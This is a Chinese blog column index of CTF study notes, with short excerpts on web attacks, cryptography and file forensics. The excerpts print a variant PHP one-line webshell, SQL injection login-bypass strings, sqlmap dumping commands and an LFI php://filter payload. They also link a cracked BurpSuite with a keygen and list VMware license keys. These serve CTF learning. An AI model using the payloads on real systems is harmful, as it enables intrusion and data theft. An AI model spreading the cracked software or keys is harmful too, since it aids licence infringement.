CTF
本专栏分享在学习CTF过程中的学习干货。
pcy190
这个作者很懒,什么都没留下…
展开
-
CTF用到的网站
1. XSSEE(用于网址编解码查看): https://web2hack.org/xssee/2. 解密/加密JS/VBS/ASP代码: https://www.dheart.net/decode/ http://tool.webmasterhome.cn/Encode.asp3.加密解密aaencode: 加密: http://utf-...原创 2018-07-29 13:17:07 · 7549 阅读 · 0 评论 -
BurpSuite 破解版(含注册机,无后门)下载注册详细教程
最近用到Burp,于是找了下吾爱破解上的注册机的原版,也就是没有后门的版本。顺带贴一个教程。仅供学习交流使用!!1. BurpSuite 1.7 原版+注册机 下载地址: csdn已经上传了 https://download.csdn.net/download/u014549283/10568556百度云:链接:https://pan.baidu.com/s/1ZGQc...原创 2018-07-27 17:45:35 · 137322 阅读 · 54 评论 -
虚拟机安装kali linux
虚拟机安装kali linuxlinux镜像下载地址http://man.linuxde.net/download/Ubuntu_16_041.安装VM pro14,密钥如下:CG54H-D8D0H-H8DHY-C6X7X-N2KG6ZC3WK-AFXEK-488JP-A7MQX-XL8YFAC5...转载 2018-07-29 11:58:04 · 3379 阅读 · 0 评论 -
【Web】内部文件上传系统漏洞分析溯源(获取shell)
【准备工具】1.中国菜刀 (可以去官网下载)官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/105709762.BurpPro3.火狐浏览器的FoxyProxy Standard插件【技术要点】1.新建一句话代码,比如1.txt,内容选择如下...原创 2018-07-29 17:19:33 · 3541 阅读 · 1 评论 -
【Web】变种一句话木马--中国菜刀连接
【Web】变种一句话木马--中国菜刀连接遇到这种文件:<?phperror_reporting(0);$_GET['POST']($_POST['GET']);?>就是变种的一句话木马 在php网址后面加上 ?POST=assert编辑栏密码为GET连接即可 或者 <?php $POST['POST']='assert...原创 2018-07-29 18:11:38 · 8653 阅读 · 2 评论 -
【Web】SQLMap的tamper的使用
【Web】SQLMap的tamper的使用1.如果需要ID后面base64编码 则另加 --tamper=base64encode 命令原创 2018-07-29 18:36:22 · 4775 阅读 · 0 评论 -
【Web】SQL手工注入Sql Server数据库 (漏洞测试)
【Web】SQL手工注入Sql Server数据库 (漏洞测试)第一步:判断是否有注入,?id=2 and 1=1 正确;id=2 and 1=2 错误,得出有注入点。第二步:判断数据库类型:?id=2 and exists (select * from sysobjects) 显示正常, 表示是ms sql server数据库。第三步:sqlmap...原创 2018-07-30 13:21:59 · 3864 阅读 · 0 评论 -
【Web】浏览器信息伪造--User-Agent及NetType微信网络检测
【Web】浏览器信息伪造--User-Agent及NetType微信网络检测User-Agent(用户代理)字符串是Web浏览器用于声明自身型号版本并随HTTP请求发送给Web服务器的字符串,在Web服务器上可以获取到该字符串。 从微信6.0开始,其内嵌的浏览器在UserAgent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,经测试,该字段至少有以下3个取...转载 2018-07-30 13:35:28 · 6501 阅读 · 0 评论 -
【CTF】PHP Hash漏洞(关于0e开头的md5值)
原题(PHP代码分析溯源)<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { ec...原创 2018-07-30 17:16:47 · 12258 阅读 · 0 评论 -
【CTF】X-Forwarded-For SQL注入实战
1.首先burp抓包,分析post包,保存为txt文件(可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数)2、使用sqlmap进行注入爆数据库sqlmap -r xxx.txt --dbs --batch 爆表名sqlmap -r xxx.txt -D 数据库名 --tab...转载 2018-07-30 18:37:00 · 4658 阅读 · 0 评论 -
【CTF】sqlmap之POST注入的两种方法(-r 和--data)
用sqlmap进行做post注入测试的时候,发现这么一种情况:对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试;发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。 故以上两种情况都是post的,却还是有区别的 故此记录如下:1:POST注入时,什么时候用“-r txt文...转载 2018-07-30 18:35:22 · 8321 阅读 · 0 评论 -
【CTF】LFI漏洞总结(PHP本地文件包含漏洞)
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html 发现地址后面的参数直接使用的文件包含。 ?file=show.php为了查看index.php的源文件, 可以使用下面的命令:rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.p...原创 2018-07-31 13:15:51 · 11033 阅读 · 0 评论 -
ZIP文件伪加密
【重点】一般错误的zip文件,会改动的地方:1. 3个头文件标记。2. 解压的pkware版本所在的标志位。3. 压缩方式的标志位。4. 全局方式位标记(有无加密)(其中如00 00这样的前面的末位是偶数的代表不加密,如09 00这样后面奇数的代表加密,打开zip需要输入密码)【分析流程】①.将得到的文件后缀名改为zip,打开后发现txt文本有提取密码;②.用Winhex工...转载 2018-08-04 15:53:55 · 3613 阅读 · 0 评论 -
各类文件的文件头标志
文件格式分析器下载JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053Ri...转载 2018-08-04 16:39:44 · 6378 阅读 · 0 评论 -
GIF修复(图片隐写)
发现文件头丢失。修复文件头。(文件头标志见这里) 这里因为提示GIF格式,于是补上47494638,然后Stegslove打开即可。参考https://blog.csdn.net/u010391191/article/details/80831998...原创 2018-08-04 16:42:47 · 11293 阅读 · 0 评论 -
【Crypto】初级的RSA分析处理
学习资料 http://www.freebuf.com/sectool/163781.htmlhttps://blog.csdn.net/dongyanwen6036/article/details/76900001?locationNum=7&fps=1openssl分析公钥,得到N,Eopenssl rsa -pubin -text -modulus -in publ...原创 2018-08-06 20:40:43 · 2337 阅读 · 0 评论 -
[Crypto]ECB模式攻击
【ECB模式攻击原理】(参考https://zachgrace.com/posts/attacking-ecb/)ecb模式使用相同的key分块对明文分别进行加密,相同的明文获得相同的密文输出 根据这一特性,可以构造如下数据进行攻击: 首先输入blocksize-1的填充,这样未知字符串的第一个字符将落到填充块的最后一个字节: XXXXXXAA AAAAAAAA AAAAAA...原创 2018-08-07 18:53:16 · 6804 阅读 · 0 评论 -
【Web】SQL注入--万能密码
后台万能密码¶admin' --admin' #admin'/*' or 1=1--' or 1=1#' or 1=1/*') or '1'='1--') or ('1'='1--username=' or ''='&password=' or ''=' 解析:select * from admin where username=''=''...原创 2018-08-08 16:33:52 · 9782 阅读 · 0 评论 -
【逆向】修改软件标题(基于PE Explorer)
【工具准备】1.PEID 0.9中文版下载点击这里2.PE Explore 下载地址点击这里【实验过程】1.首先用PEiD打开软件查壳,发现无壳,而且用basic编写的。 2.然后用PE Explorer将软件打开3.点击工具栏中的 "资源查看/编辑器" 按钮 (四个三角形构成的菱形图案)4.单击左侧的 RC资源--...原创 2018-08-13 12:56:18 · 16281 阅读 · 0 评论 -
【WEB】检测是否安装了 .NET Framework 9.9
useragent中写入Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 9.9)官方文档:https://docs.microsoft.com/zh-cn/dotnet/framework/wpf/app-development/how-to-detec...转载 2018-08-16 12:13:06 · 1896 阅读 · 0 评论 -
【WEB】语言代码缩写表大全(用于Accept-Language)
语言代码缩写表大全 注意大小写:全部小写!! af 南非公用荷兰语 sq 阿尔巴尼亚语 ar-sa 阿拉伯语(沙特阿拉伯) ar-iq 阿拉伯语(伊拉克) ar-e...转载 2018-08-16 15:20:54 · 15123 阅读 · 1 评论